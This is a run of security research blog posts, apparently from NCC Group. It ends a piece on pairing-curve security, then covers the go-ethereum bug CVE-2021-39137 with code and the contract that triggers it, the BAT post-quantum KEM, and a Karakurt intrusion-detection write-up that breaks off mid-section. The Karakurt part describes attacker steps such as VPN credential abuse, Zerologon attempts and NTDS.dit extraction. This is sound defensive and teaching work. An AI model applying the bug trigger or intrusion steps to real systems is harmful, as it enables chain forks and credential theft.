Despite the recent changes in security estimates, there are a wealth of new curves which promise 128 bit security, many of which can be dropped into place in current pairing protocols. For those who already have a working implementation using BLS12-381 in a more rigid space, experiments with Guillevic’s sage code seemed to suggest that application of SexTNFS would only marginally reduce the security to ~120 bit security, which currently is still a totally infeasible problem to solve.

Conclusions

TL;DR

Algorithmic improvements have recently reduced the bit-security of pairing-friendly curves used in pairing-based cryptography, but not by enough to warrant serious concern about any current implementations.

Recommendations

The reductions put forward by improvements in the asymptotic complexity of the SexTNFS do not weaken current pairing based protocols significantly enough to cause a mass panic of protocol changes. The drop from 128 bit security to ~120 bit security leaves the protocol secure from all reasonable attacks, but it does change how we talk about the bit-security of specific pairing friendly curves.

XKCD Security

Before a pairing-based protocol with “only” 120 or even 100-bit security is broken, chances are, some other security vulnerability will be exposed which requires less than a universe’s computation power to break. Perhaps a more looming threat is the arrival of quantum computers which break pairing-based protocols just like all cryptographic protocols which depend on the hardness of the discrete logarithm problem for some Abelian group, but that’s for another blog post.

For the most part, the state-of-the-art improvements which effect pairing-based protocols should be understood to ensure our protocols behave as they are described. Popular curves, such as those appearing in BLS12-381 can still be described as safe, pairing-friendly curves, just not 128-bit secure pairing curves. The newly developed curves become important if you wish to advertise security to a specific NIST level, or simply state 128-bit security of a protocol implementation. In these scenarios, we must keep up to date and use the new, fine-tuned curves such as Fotiadis-Martindale curve FM17 or the modified BLS curve BLS12-440.

Computational Records

As a final comment, it’s interesting to look at where the current computation records stand for cryptographically hard problems and compare them to standard security recommendations

  • The RSA factoring record is for a 829-bit modulus. The current recommendations are 2048-4096 bit moduli, with 128-bit security for 3072 moduli.
  • The NFS Diffie-Hellman record for \mathbb{F}^*_p is for a 795-bit prime modulus. Recommended groups lie in the range of 1536-4096 bit prime order.
  • One ECDLP record was completed on the bitcoin curve secp256k1, with a 114-bit private key. The current recommendation is to use 256-512 bit keys
  • The current pairing-friendly ECDLP record was against a BN-curve of 114-bit group order. Pairing-friendly curves usually are generated with ~256-bit prime order
  • The current standing TNFS record is for p^6 with 512 bits. In comparison, BLS12-381 has p^{12} with 4572 bits.

We see that of all these computationally hard problems, the biggest gap between computational records and security estimates is for solving the discrete log problem using the TNFS. Partially, this is historical; solving the discrete log in \mathbb{F}_q^* has only really gained interest because of pairing-based protocols and this area is relatively new. However, even in the context of pairing-friendly curves, the most significant attack used the familiar Pollard’s rho algorithm to solve the discrete logarithm problem on the elliptic curve, rather than the (Sex)TNFS on the output of the pairing.

The margins we give cryptographically hard problems have a certain level of tolerance. Bit strengths of 128 and 256 are targets aimed for during protocol design, and when these advertised margins are attacked and research shows there are novel algorithms which have lower complexity, cryptographers respond by modifying the protocols. However, often after an attack, previous protocols are still robust and associated cryptographic problems are still infeasible to solve.

This is the case for the pairing-friendly curves that we use today. Modern advances have pushed cryptographers to design new 128 bit secure curves, but older curves such as the ones found in BLS12-381 are still great choices for cryptographic protocols and thanks to the slightly smaller primes used, will be that much faster than their 440-bit contemporaries.

Summary

  • Pairing-based cryptography introduces a relatively new set of interesting protocols which have been developed over the past twenty years.
  • A pairing is a map which takes elements from two groups and returns an element in a third group.
  • For all practical implementations, we use elliptic curve pairings, which take points as input and returns elements of \mathbb{F}_{p^k}^*.
  • Pairing-based protocols offer a unique challenge to cryptographers, requiring the generation of special pairing-friendly elliptic curves which allow for efficient pairing, while still maintaining the hardness of the discrete logarithm problem for all three groups.
  • Asymmetric protocols are only as secure as the corresponding best known attacks are slow. If researchers improve an algorithm, parameters for the associated cryptographic problem must be increased, resulting in the protocol becoming less efficient.
  • Increased attention on pairings in a cryptographic context has inspired more research on improving algorithms which can solve the discrete logarithm problem in \mathbb{F}_{p^k}^*.
  • The newly discovered exTNFS and SNFS, allow a reduction in the complexity of solving the discrete logarithm problem in \mathbb{F}^*_{p^k} using the SexTNFS.
  • For pairing friendly-curves generated without knowledge of these algorithms (or before their discovery) the advertised bit-strength of a curve may be lower than described.
  • Although research on TNFS and related algorithms is still ongoing, new improvements are only expected to happen in the o(1) contribution of L_n[\alpha, c], which could only cause small modifications to the bit complexity. Any substantial change in complexity would be as surprising as a change in the security of the ECDLP.
  • These modifications should only really concern implementations which promise a specific bit-security, from the point of view of real-world security, the improvements offered by the SexTNFS and related algorithms is more psychological than practical.

Appendix: Mathematical Notation

The below review will not be sufficient for a reader not familiar with these topics, but should act as a gentle reminder for a rusty reader.

Groups, Fields and Curves

Groups

For a set G to be considered as a group we require a binary operator \circ such that the following properties hold:

  • Closure: For all a,b \in G, the composition a \circ b \in G
  • Associativity: a \circ ( b \circ c) = (a \circ b) \circ c
  • Identity: there exists an element e such that e \circ a = a \circ e = a for all a \in G
  • Inverse: for every element a \in G there is an element b \in G such that a\circ b = b \circ a = e

An Abelian group has the additional property that the group law is commutative:

  • Commutativity: a \circ b= b \circ a for all elements a,b \in G.

Fields and Rings

A field is a set of elements which has a group structure for two operations: addition and multiplication. Additionally, the field operations are commutative and distributive. When considering the group multiplicatively, we remove the identity of the additive group from the set to ensure that every element has a multiplicative inverse. An example of a field is the set of real numbers \mathbb{R} or the set of integers modulo a prime \mathbb{Z} / p\mathbb{Z} (see below).

We denote the multiplicative group of a field k as k^*.

A ring is very similar, but we relax the criteria that every non-zero element has a multiplicative inverse, and operations need not be commutative. An example of a ring is the set of integers \mathbb{Z}, where every integer a \in \mathbb{Z} has an additive inverse: -a \in \mathbb{Z} but for a \times b = 1 for a \in \mathbb{Z} we do not have that b \in \mathbb{Z} (unless a=b=1 or a=b=-1).

Finite Fields

Finite fields, also known as Galois fields, are denoted in this blog post as \mathbb{F}_q for q = p^k for some prime p and positive integer k. When k=1, we can understand \mathbb{F}_p as the set of elements \mathbb{Z} / p\mathbb{Z} = \{0, \ldots, p-1 \} which is closed under addition and excluding 0, is also closed under multiplication. The multiplicative group is \mathbb{F}_p^* = \{ 1, 2, \ldots, p-1 \}.

When k > 1, the finite field \mathbb{F}_q has elements which are polynomials \mathbb{F}_p[x] of degree d < k. The field is generated by first picking an irreducible polynomial f(x) and considering the field \mathbb{F}_q = \mathbb{F}_p[x] / (f). Here the quotient by (f) can be thought of as using f(x) as the modulus when composing elements of \mathbb{F}_q.

Elliptic Curves

For our purposes, we consider elliptic curves over finite fields, of the form

E(\mathbb{F}_q) : y^2 = x^3 + Ax + B,

where the coefficients A,B \in \mathbb{F}_q and a point on the curve P(x,y) is a solution to the above equation where x,y \in \mathbb{F}_q, together with an additional point \mathcal{O} which is called the point at infinity. The field \mathbb{F}_{q} where q = p^k has characteristic p and to use the form of the curve equation used above, we must additionally impose p \neq 2,3.

The set of points on an elliptic curve form a group and the point at infinity acts as the identity element: P + \mathcal{O} = \mathcal{O} + P = P and P - P = \mathcal{O}. The group law on an elliptic curve is efficient to implement. Scalar multiplication is realised by repeated addition: [3]P = P + P + P.

Footnotes

  1. One year later, this attack was generalised by Frey and Ruck to ordinary elliptic curves and is efficient when the embedding degree of the curve is “low enough”. We will make this statement more precise later in the blogpost.
  2. As a recap, the decision Diffie-Hellman (DDH) problem is about the assumed hardness to differentiate between the triple (g^a g^b, g^{ab}) and (g^a g^b, g^{c}) where a,b,c are chosen randomly. Note that if the discrete log problem is easy, so is DDH, but being able to solve DDH does not necessarily allow us to solve the discrete log problem.
  3. The roots of unity are the elements \mu_r \in \mathbb{F}_{p^k} such that (\mu_r)^r = 1. As a set, the rth roots of unity form a multiplicative cyclic group.
  4. It can be proved that the Weil embedding degree k \geq 1 always exists, and that the r-torsion group E(\mathbb{F}_{p^k})[r] \subset E(\mathbb{F}_{p^k}) decomposes into \mathbb{Z}_n \times \mathbb{Z}_n Once k has been found, further extending to \mathbb{F}_{p^{k+n}} will not increase the size of the r-torsion.
  5. In an attempt to not go too far off topic, a divisor can be understood as a formal sum of points \mathcal{D} = n_1 P_1 + \ldots n_k P_k. Given a rational function f(x,y), the divisor of a function (f) is a measure of how the curve f(x,y) intersects with the elliptic curve E and is computed as \sum_{P \in E} \text{ord}_P(f)(P). For a very good and comprehensive discussion of the mathematics (algebraic geometry) needed to appreciate the computations of pairings, we recommend Craig Costello’s Pairing for Beginners.
  6. As another way to think about this, we have that (p^k - 1) = rN for some integer n. We can rephrase this as p^k \equiv 1 \pmod r and so the Tate embedding degree k is the order of p \pmod r
  7. The distribution of small k was formally studied in the context of the expectation that a random curve could be attacked by the MOV algorithm. R. Balasubramanian & N. Koblitz showed in The Improbability That an Elliptic Curve Has Subexponential Discrete Log Problem under the Menezes—Okamoto—Vanstone Algorithm that the probability that we find a small embedding degree: k < (\log p)^2 is vanishingly small.
  8. Hashing bytes to a point on a curve can be efficiently performed, as described in Hashing to Elliptic Curves
  9. This BLS triple is distinct from the BLS curves, although Ben Lynn is common to both of them
  10. The term operations here can hide a computational complexity. If your operation is addition of elliptic curve points, this will have an additional hidden cost when compared to an operation such as bit shifting, or multiplication modulo some prime. Some authors mitigate this by using a clock cycle as the operation.
  11. Although here we think of this key as a 256 long stream of 1s and 0s, we’re much more familiar with seeing this 32-byte key as a hexadecimal or base64 encoded string
  12. For fun, we include a tonuge-in-cheek estimate. Equipping every one of the world’s 8 billion humans with their very own “world’s fastest supercomputer”, the burning hot computer-planet would be guessing \sim2^{80} keys per second. At this rate, it would take 17 million years to break AES-128. For AES-256, you’ll need a billion copies of these supercomputer Earths working for more than 2 billion times longer than the age of the universe. 🥵
  13. In fact, this relationship between factoring and the discrete log problem even shows up in a quantum context. Shor’s algorithm was initially developed as a method to solve the discrete log problem and only then was modified (with knowledge of this close relationship) to then produce a quantum factoring algorithm. Shor tells this story in a great video.
  14. When an elliptic curve has additional structure we can sometimes solve the ECDLP using sub-exponential algorithms by mapping points on the curve to some “easier” group. When the order of the elliptic curve is equal to its characteristic (\# E(\mathbb{F}_p) = p), Smart’s anomalous curve attack maps points on the elliptic curve to the additive group of integers mod p, which means the discrete logarithm problem is as hard as inversion mod p (which is not hard at all!). When the embedding degree k is small enough, we can use pairings to map from points on the elliptic curve to the multiplicative group \mathbb{F}^*_{p^k}. This is exactly the worry we have here, so let’s go back to the main text!
  15. In this context, medium refers to a number theorist’s scale, which we can interpret as “cryptographically sized”. Although 5000 bit numbers seem large for us, number theorists are interested in all the numbers and the set of numbers you can store in a computer are still among the smallest of the integers!
✇NCC Group Research

A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented

By: aleks224

This blog post discusses two erroneous computation patterns in Golang. By erroneous computation we mean simply that given certain input, a computer program with certain state returns incorrect output or enters an incorrect state. While clearly there are no limits on how erroneous computations can happen in general, there are language usage patterns which make erroneous computation more likely. In blockchain, erroneous computation is a problem as the ledger can end up in an unexpected state or the blockchain may get wedged at a certain corrupt endpoint. In addition, if erroneous computation happens in only a subset of nodes on the network, a netsplit occurs, which may result in double-spend attacks.

The first erroneous computation example is CVE-2021-39137 which is an interesting go-ethereum bug identified by Guido Vranken. The bug caused a netsplit in the Ethereum network and essentially results from the ability to have a mutable and non-mutable slice referencing the same chunk of memory. The second erroneous computation pattern example is extracted from the Go Programming book by Donovan and Kerninghan and concerns deferred functions’ access to parent-scope variables. This pattern could happen in any language that supports parent-scope variables in a similar way Golang does.

This blog post is motivated by NCC Group’s reviews of Cosmos blockchain implementations. Cosmos is a blockchain building framework which offers an out-of-the-box consensus protocol and an SDK that provides tools backing common state transition code and, as such aims to be the "Ruby on Rails of blockchain". It allows connecting to other Cosmos blockchains via IBC (Inter Blockchain Communication Protocol) and allows drawing the consensus security from parent chains (Inter-blockchain security). The developer mainly implements the state-transition logic. It is worth noting that:

  • Panics are recovered from by the Cosmos framework and treated as errors. This renders a whole class of Golang Denial of Service bugs unimportant. This includes eg. nil pointer dereferences, out of bounds array/slice reads and writes, calling methods on nil interfaces, etc.
  • Often times, Cosmos SDK blockchain apps are fairly simple in terms of the Golang constructs they use. They may be conservative in that they don’t use Go routines and channels, known as another common source of bugs in Golang. In addition, severity of eventual race conditions may be low due to the fact that the condition needs to happen on a large portion of nodes at once.

Given the setting described above, other generic erroneous computation patterns in Golang are worth discussing (unrelated to Denial of Service via panic or Golang’s concurrency primitives). Let’s discuss the first bug, for which we speculate would not happen if Rust was used since Rust does not allow simultaneously having a mutable and an immutable reference pointing to the same memory.

CVE-2021-39137: Erroneous computation in go-ethereum

Given a specially crafted contract, go-ethereum nodes would fork off the network, as their contract evaluation result would be different than the rest of the network. Erroneous computation in blockchain clients is a serious issue, since it results in network forks and can lead to double-spend attacks.

The post-mortem which explains this bug involves several EVM details with which the reader may not be familiar. We start with a code snippet that removes all the EVM details, is very simple, and makes the bug obvious. It should be noted that the code below is not present in the go-ethereum implementation, it just mimics the essence of the issue when all of the EVM details are removed:

func returnAndCopy(mem []byte, n int, copyTo int) []byte {
	// boundary checks omitted

	ret := mem[0:n]

	copy(mem[copyTo:copyTo+n], mem[0:n])    // copy(dst, src)

	return ret
}

The returnAndCopy function returns the first n bytes of a slice. Before that, it copies those same n bytes to a different location in the slice. For example:

 slice := []int{0,1,2,3,4,5,6,7,8,9}
 fmt.Println(returnAndCopy(slice, 3, 5))    // 0,1,2

In this case, the returnAndCopy function returns correct values:

  0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
  ----------         -----------  
   return  	        copyTo

  0 | 1 | 2 | 3 | 4 | 0 | 1 | 2 | 8 | 9
  ----------         -----------  
   return	        copyTo

  return: 0 | 1 | 2      // correct

In this example, the return interval and copy interval do not intersect. If the intervals have shared (common) locations in the array, but do not point to the exact same subarray, returnAndCopy fails to produce the correct result:

 slice := []int{0,1,2,3,4,5,6,7,8,9}
 fmt.Println(returnAndCopy(slice, 3, 1))

In more detail:

  0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
  ----------         
  return	      
      ----------
        copyTo

  0 | 0 | 1 | 2 | 4 | 5 | 6 | 7 | 8 | 9
  ----------         
  return	      
     -----------
        copyTo

  return: 0 | 0 | 1      // incorrect

The issue is that ret and mem are pointing to the same backing memory. A modification to mem affects the ret slice in an unintended way. It is interesting to note that the same bug would likely be prevented in Rust, as the compiler would prevent having a mutable and non-mutable references to a same memory location. If that is the case, Rust’s memory safety principles would have prevented this hard fork bug from happening.

Mapping to EVM: CVE-2021-39137 identifies the previously described pattern inside go-ethereum‘s EVM. Let’s start from looking at the key line of the contract that demonstrated the vulnerability, decompiled from the statetest provided at the end of post-mortem.

contract Contract {
    function main() {
        memory[0x00:0x01] = 0x01;
        memory[0x01:0x02] = 0x02;
        memory[0x02:0x03] = 0x03;
        memory[0x03:0x04] = 0x04;
        memory[0x04:0x05] = 0x05;
        memory[0x05:0x06] = 0x06;
        var temp0;
        temp0, memory[0x02:0x08] = address(0x04).call.gas(0x7ef0367e633852132a0ebbf70eb714015dd44bc82e1e55a96ef1389c999c1bca)(memory[0x00:0x06]);     // (1) 
        // [...]

After filling up the EVM contract memory with an increasing sequence of bytes, a contract at address 0x04 is called at the line denoted by (1).

The contract at address 0x04 is a special, "pre-compiled" contract and it is implemented natively in go-ethereum. Pre-compiled contracts implement commonly used functionalities such as hash function computation and elliptic curve operations. In this case, the dataCopy pre-compiled contract is very simple, it implements the "identity" function, which just returns its one argument:

func (c *dataCopy) Run(in []byte) ([]byte, error) {
        return in, nil
}

Let’s next look what happens inside opCall, right after dataCopy is called:

func opCall(pc *uint64, interpreter *EVMInterpreter, scope *ScopeContext) ([]byte, error) {

  // ..SNIP..

        ret, returnGas, err := interpreter.evm.Call(scope.Contract, toAddr, args, gas, bigVal)  // (2)

	if err != nil {
                temp.Clear()
        } else {
                temp.SetOne()
        }
        stack.push(&amp;temp)
        if err == nil || err == ErrExecutionReverted {
                //  ret = common.CopyBytes(ret)       //  (3) (FIX)
                scope.Memory.Set(retOffset.Uint64(), retSize.Uint64(), ret)    // (4) overwrite
        }
        scope.Contract.Gas += returnGas

	interpreter.returnData = ret    // (5) returnData set
        return ret, nil
}

Relevant to CVE-2021-39137 are the following aspects:

  • In the line denoted with (2), the ret value is a slice that points to the first 6 bytes of the contract memory. That portion of the memory was chosen by the caller in the offending contract (memory[0x00:0x06], see line (1)). The dataCopy contract does not create a new copy of memory before returning.
  • The call to scope.Memory.Set copies ret to another location, see line (4). The copy target location is chosen by the caller and in the case of the decompiled contract above, it is memory[0x02:0x08], see line (1).
  • Close to the end of the opCall implementation at line (5), interpreter.returnData is set to be equal to ret, that is, memory[0x00:0x06]. In EVM, the interpreter keeps track of "returnData": this is an internal holder opCode that calls other contracts returned.

The scope.Memory.Set line corrupts the memory that returnData will point to and returnData ends up being incorrect (0|1|0|1|2|3 as opposed to 0|1|2|3|4|5). The fix is to add line (3), which preserves the original subslice that will be returned before it is overwritten.

Note: A related issue in Golang concerns memory reallocation which happens in the context of the append function. This type of edge-case behavior can be more likely to cause issues as it may evade detection in testing.

Parent scope variables in deferred execution

This bug is similar to a general bug pattern where global variables change underneath code in an unforeseen way. Recall that functions are "first-class values" (pg. 135, sect 5.6 in the Golang book):

func main() {

	var f func(k int) int

	f = func(n int) int {
		return n*n
	}

        fmt.Println(f(2))      // 4 

}

This means that functions can be assigned to variables, passed to and returned from functions. Functions cannot be compared, and their zero value is nil. It is interesting to note that functions have state. See the following example:

func createIncrease() func() int {

	x := 0
	increase := func() int {
                x = x + 1
                return x
        }

	return increase
}  // x goes out of scope

func main() {

	f := createIncrease()

        fmt.Println(f())  // 1
        fmt.Println(f())  // 2
}

Even though x went out of scope (as a local variable inside createIncrease function), x still exists as a part of the f function’s state. We don’t see x anymore, but it’s there. There is also the question what happens if multiple functions pick up on the same parent scope variable:

func createIncreaseAndSquare() (func() int, func() int) {
        x := 2
        increase := func() int {
                x = x + 1
                return x
        }

        square := func() int {
                x = x*x
                return x
        }

	return increase, square
}

func main() {

	// x is created inside createIncrease and goes out of scope
	f, g := createIncreaseAndSquare()

	// x lives on
	fmt.Println(g())  // 4
        fmt.Println(g())  // 16

	// f shares the same x as g
        fmt.Println(f())  // 17
}

As can be seen, the parent-scope variable is shared between the two functions. This is similar to the usage of global variables by which a global variable may change underneath the deferred function from multiple locations in the code.

func main() {

        keys := []string{"first", "second", "third"}
        m := make(map[string]bool)
	var cleanupFs []func()

        for _, k := range keys {

		m[k] = true

		// k := k       &lt;-- FIX

		cleanupFs = append(cleanupFs, func() {
                        fmt.Println(&quot;deleting &quot;, k)
		        delete(m, k)
	        })
	}

	// ..do something with m..

	// clean up
        for _, cleanup := range cleanupFs {
                cleanup() 
	}
}

The map does not properly get cleaned up. The "clean up" for loop only deletes the "third" key from the map and does so 3 times:

	// deleting  third
	// deleting  third
	// deleting  third

As the loop unwinds, the cleanup functions are picking up the parent scope’s k variable. By the end of the for loop, the delayed functions and the parent function share the same k, which is equal to "third".

Conclusion

Both bug types described in this blog post can roughly be described as variable content unexpectedly changing underneath code. Whether a particular logical issue of this type is labeled as a security issue or not is less important. Audits of correctness-critical Golang code such as Cosmos blockchain code should include checking for these types of issues.

Written by Aleks Kircanski of NCC Group Cryptography Services

✇NCC Group Research

BAT: a Fast and Small Key Encapsulation Mechanism

By: Thomas Pornin

In this post we present a newly published key encapsulation mechanism (KEM) called BAT. It is a post-quantum algorithm, using NTRU lattices, and its main advantages are that it is both small and fast. The paper was accepted by TCHES (it should appear in volume 2022, issue 2) and is also available on ePrint: https://eprint.iacr.org/2022/031

An implementation (in C, both with and without AVX2 optimizations) is on GitHub: https://github.com/pornin/BAT

What is a Post-Quantum KEM?

Asymmetric cryptography, as used in, for instance, an SSL/TLS connection, classically falls into two categories: digital signatures, and key exchange protocols. The latter designates a mechanism through which two parties send each other messages, and, at the end of the protocol, end up with a shared secret value that they can use to perform further tasks such as symmetric encryption of bulk data. In TLS, the key exchange happens during the initial handshake, along with signatures to convince the client that it is talking to the expected server and none other. A key encapsulation mechanism is a kind of key exchange protocol that can work with only two messages:

  • Party A (the server, in TLS) sends a generic, reusable message that is basically a public key (this message can conceptually be sent in advance and used by many clients, although in TLS servers usually make a new one for each connection, to promote forward secrecy).
  • Party B (the client, in TLS) sends a single message that uses the information from A’s message.

Key encapsulation differs from asymmetric encryption in the following sense: the two parties obtain in fine a shared secret, but neither gets to choose its value; it is an output of the protocol, not an input. The two concepts of KEM and asymmetric encryption are still very close to each other; an asymmetric encryption can be used as a KEM by simply generating a sequence of random bytes and encrypting it with the recipient’s public key, and, conversely, a KEM can be extended into an asymmetric encryption system by adjoining a symmetric encryption algorithm to it to encrypt a message using, as key, the shared secret that is produced by the KEM (when the KEM is Diffie-Hellman, there is even a rarely used standard for that, called IES).

In today’s world, we routinely use KEMs which are fast and small, based on elliptic curve cryptography (specifically, the elliptic curve Diffie-Hellman key exchange). However, tomorrow’s world might feature quantum computers, and a known characteristic of quantum computers is that they can easily break ECDH (as well as older systems such as RSA or classic Diffie-Hellman). There is currently no quantum computer that can do so, and it is unknown whether there will be one in the near future (or ever), but it makes sense to make some provisions for that potential ground-breaking event, that is, to develop some post-quantum algorithms, i.e. cryptographic algorithms that will (presumably) successfully defeat attackers who wield quantum computers.

The NIST has been running for the last few years a standardization process (officially not a competition, though it features candidates and rounds and finalists) that aims at defining a few post-quantum KEMs and signature algorithms. Among the finalists in both categories are algorithms based on lattice cryptography; for KEMs, the two lattice-based algorithms with the “best” performance trade-offs are CRYSTALS-Kyber and Saber.

BAT

BAT is not a candidate to the NIST post-quantum project; it has been just published and that is way too late to enter that process. However, just like standardization of elliptic curve cryptography in the late 1990s (with curves like NIST’s P-256) did not prevent the appearance and wide usage of other curve types (e.g. Curve25519), there is no reason not to keep researching and proposing new schemes with different and sometimes better performance trade-offs. Let us compare some performance measurements for Kyber, Saber and BAT (using the variants that target “NIST level 1” security, i.e. roughly the same as AES-128, and in practice the only one you really need):

Algorithm Keygen cost
(kilocycles)
Encapsulation
cost (kilocycles)
Decapsulation
cost (kilocycles)
public key
size (bytes)
ciphertext
size (bytes)
Kyber 23.6 36.8 28.5 800 768
Saber 50.0 59.0 57.2 672 736
BAT 29400 11.1 59.7 521 473
Kyber, Saber and BAT performance on Intel x86 Coffee Lake

These values were all measured on the same system (Intel x86 Coffee Lake, 64-bit, Clang-10.0.0). Let us see what these numbers mean.

First, it is immediately obvious that BAT’s key pair generation is expensive, at close to 30 millions of clock cycles. It is a lot more than for the two other algorithms. However, it is not intolerably expensive; it it still about 10 times faster than RSA key pair generation (for 2048-bit keys), and we have been using RSA for decades. This can still run on small embedded microcontrollers. Key pair generation is, normally, a relatively rare operation. It is quite convenient if key pair generation is very fast, because, for instance, it would allow a busy TLS server to create a new key pair for every incoming connection, which seems best for forward secrecy, but if key pair generation is not so fast, then simply creating a new key pair once every 10 seconds can still provide a fair amount of forward secrecy, at negligible overall cost.

Then we move to encapsulation and decapsulation costs, and we see that BAT encapsulation (the client-side operation, in a TLS model) is very fast, with a cost lower than a third of the cost of Kyber encapsulation, while decapsulation is still on par with that of Saber. We could claim a partial victory here. Does it matter? Not a lot! With costs way lower than a million cycles, everything here is way too fast to have any noticeable impact on a machine such as a laptop, smartphone or server, even if envisioning a very busy server with hundreds of incoming connections per second. Cost may matter for very small systems, such as small microcontrollers working on minimal power, but the figures above are for a big 64-bit x86 CPU with AVX2 optimizations everywhere, which yields very little information on how things would run on a microcontroller (an implementation of BAT optimized for such a small CPU is still a future work at this time).

What really matters here for practical Web-like deployments is the sizes. Public keys and ciphertexts (the two messages of a KEM) travel on the wire, and while networks are fast, exchanges that require extra packets tend to increase latency, an especially sensitive parameter in the case of TLS key exchanges since that happens at the start of the connection, when the human user has clicked on the link is and is waiting for the target site to appear. Human users have very low patience, and it is critical to have as low a latency as possible. Cloudflare has recently run some experiments with post-quantum signature schemes in that area, and it appeared that the size of public keys and signatures of current candidates is a problem. Similar issues impact KEMs as well (though with a lower magnitude because in a TLS handshake, there is a single KEM but typically several signatures and public keys, conveyed in X.509 certificates).

We may also expect size of public keys and ciphertexts to be an important parameter for low-power embedded applications with radio transmission: the energy cost of message transmission is proportional to its size, and is typically much greater than the cost of the computations that produced that message.

We see that BAT offers public key and ciphertext sizes which are significantly lower than those of Kyber and Saber, with savings of about 25 to 40%. This is where BAT shines, and what makes the scheme interesting and worth investigating a bit. Like all new schemes, it shall certainly not be deployed in production! It should first undergo some months (preferably years) of analysis by other researchers. If BAT succeeds at defeating attackers for a few years, then it could become a good candidate for new protocols that need a post-quantum KEM.

The Lattice

Without entering into the fine details of the lattice used by BAT, I am going to try to give an idea about how BAT can achieve lower public key and ciphertext sizes.

Practical lattice-based algorithms tend to work with lattices expressed over a polynomial ring: values are polynomials with coefficients being integers modulo a given integer q (usually small or small-ish, not necessarily a prime), and polynomial computations being made modulo the polynomial Xn+1 with n being a power of 2, often 256, 512 or 1024 (these are convenient cyclotomic polynomials, that allows very fast computations thanks to the number-theoretic transform). Depending on the scheme, there may be one or several such values in a public key and/or a ciphertext. While the internal mechanics differ in their details and even in the exact hard problem they rely on, they tend to have the same kind of trade-off between security, reliability and modulus size.

Indeed, encapsulation can be thought of as injecting a random value as “error bits” in an operation, and decapsulation leverages the private key in order to find the most plausible initial input, before the errors were inserted. Larger errors hide the secret better, but also increase the probability that the decapsulation gets it wrong, i.e. obtains the wrong output in the end. In order to maintain the security level while getting decapsulation error probability so low that it will never happen anywhere in the world, the usual trick is to increase the value of the modulus q. However, a larger q mechanically implies a larger public key and a larger ciphertext, since these are all collections of values modulo q. There are various tricks that can save some bits here and there, but the core principle is that a larger q is a problem and an algorithm designer wants to have q as small as possible.

Saber uses q = 8192. Kyber uses q = 3329. In BAT, q = 257. This is why BAT keys and ciphertexts are smaller.

How does BAT cope with the smaller q? In a nutshell, it has an enhanced decapsulation mechanism that “gets it right” more often. The BAT lattice is a case of a NTRU lattice with a complete base: the private key consists of (in particular) four polynomials f, g, F and G, with small integer coefficients (not integer modulo q, but plain integers), which are such that gF – fG = q. This is known as the NTRU equation. Polynomials f and g are generated randomly with a given distribution, and finding matching F and G is the reason why the key pair generation of BAT is expensive. This is in fact the same key pair generation as in the signature scheme Falcon, though with slightly smaller internal values, and, I am pleased to report, no floating-point operations anywhere. BAT is completely FPU-free, including in the key pair generation; that should make it quite easier to implement on microcontrollers.

Any (F,G) pair that fulfills the NTRU equation allows some decapsulation to happen, but the error rate is lowest when F and G are smallest. The F and G polynomials are found as an approximate reduction using Babai’s nearest plane algorithm, which would return an “optimal” solution with non-integral coefficients, so the coefficients are rounded and F and G are only somewhat good (they are the smallest possible while still having integers as coefficients). The main idea of BAT is to make “better” F and G by also working part of the decapsulation modulo another prime (64513, in the case of BAT) with an extra polynomial (called w in the paper) that in a way incarnates the “missing decimals” of the coefficients of F and G. These computations are only on the decapsulation side, they don’t impact the public key or ciphertext sizes, but they considerably lower the risk of a decapsulation error, and thereby allow using a much smaller modulus q, which leads to the smaller public keys and ciphertexts.

Next Steps

BAT is still in its infancy and I hope other researchers will be motivated into trying to break it (and, hopefully, fail) and extending it. This is ongoing research. I will also try to make an optimized implementation for a small microcontroller (in the context of the NIST post-quantum project, the usual target is the ARM Cortex M4 CPU; the current C code should compile as is and run successfully, but this should be done and performance measured, and some well-placed assembly routines can most likely reduce costs).

✇NCC Group Research

Detecting Karakurt – an extortion focused threat actor

By: RIFT: Research and Intelligence Fusion Team

Authored by: Simon Biggs, Richard Footman and Michael Mullen

tl;dr

NCC Group’s Cyber Incident Response Team (CIRT) have responded to several extortion cases recently involving the threat actor Karakurt. 

During these investigations NCC Group CIRT have identified some key indicators that the threat actor has breached an environment and we are sharing this intelligence to assist the cyber defense security community.  

It is thought that there may be a small window to respond to an undetected Karakurt breach prior to data exfiltration taking place and we strongly urge any organisations that use single factor Fortinet VPN access to use the information from the detection section of this blog to identify if they may have been breached. 

Initial Access  

In all cases investigated, Karakurt have targeted single factor Fortigate Virtual Private Network (VPN) servers.  

It was observed that access was made using legitimate Active Directory credentials for the victim environment. 

The typical Dwell time (Time from threat actor access to detection) has been in the region of just over a month, in part due to the fact the group do not encrypt their victims and use “living off the land” techniques to remain undetected by not utilising anything recognised as malware.   

It is not clear how these credentials have been obtained at this stage with the VPN servers in question not being vulnerable to the high profile Fortigate vulnerabilities that have had attention over the past couple of years. 

NCC Group strongly recommends that any organisation utilising single factor authentication on a Fortigate VPN to search for the indicators of compromise detailed at the conclusion of this blog.  

Privilege Escalation  

Karakurt have obtained access to domain administrator level privileges in all of the investigated cases, but the privilege escalation method has not yet been accurately determined.  

In one case, attempts to exploit CVE-2020-1472, also known as Zerologon, were detected by security software. The actual environment was not vulnerable to Zerologon however indicating Karakurt may be attempting to exploit a number of vulnerabilities as part of their operation.  

Lateral Movement  

Karakurt have then been seen to move laterally onto the primary domain controller of their victim’s using the Sysinternals tool PsExec which provides a multitude of remote functionality. 

Karakurt have also utilised Remote Desktop Protocol (RDP) to move around victim environments.      

Discovery  

Once Karakurt obtain access to the primary domain controller they conduct a number of discovery actions, enumerating information about the domain controller itself as well as the wider domain.  

One particular technique involves creating a DNS Zone export via an Encoded PowerShell command.  

This command leaves a series of indicators in the Microsoft-Windows-DNS-Server-Service Event Log in the form of Event ID 3150, DNS_EVENT_ZONE_WRITE_COMPLETED.  

This log is interesting as an indicator as it was present in all Karakurt engagements investigated by NCC Group CIRT and in all cases the only occurrence of these events were caused when Karakurt performed the zone exports. This was conducted very early in the breach just after initial access and prior to data exfiltration occurring, which was typically two weeks from initial access.  

This action is also accompanied by extraction of the NTDS.dit file, believed to be utilised by Karakurt to obtain further credentials as a means of persistence in the environment should the account they initially gained access with be disabled.  

This is evident through the presence of logs showing the volume shadow service being utilised.  

NCC Group CIRT strongly recommends that any organisation using single factor Fortinet VPN access checks their domain controllers Microsoft-Windows-DNS-Server logs for evidence of Event ID 3150. If this is present at any point since December then it may well be an indicator of a breach by Karakurt. 

Data Staging  

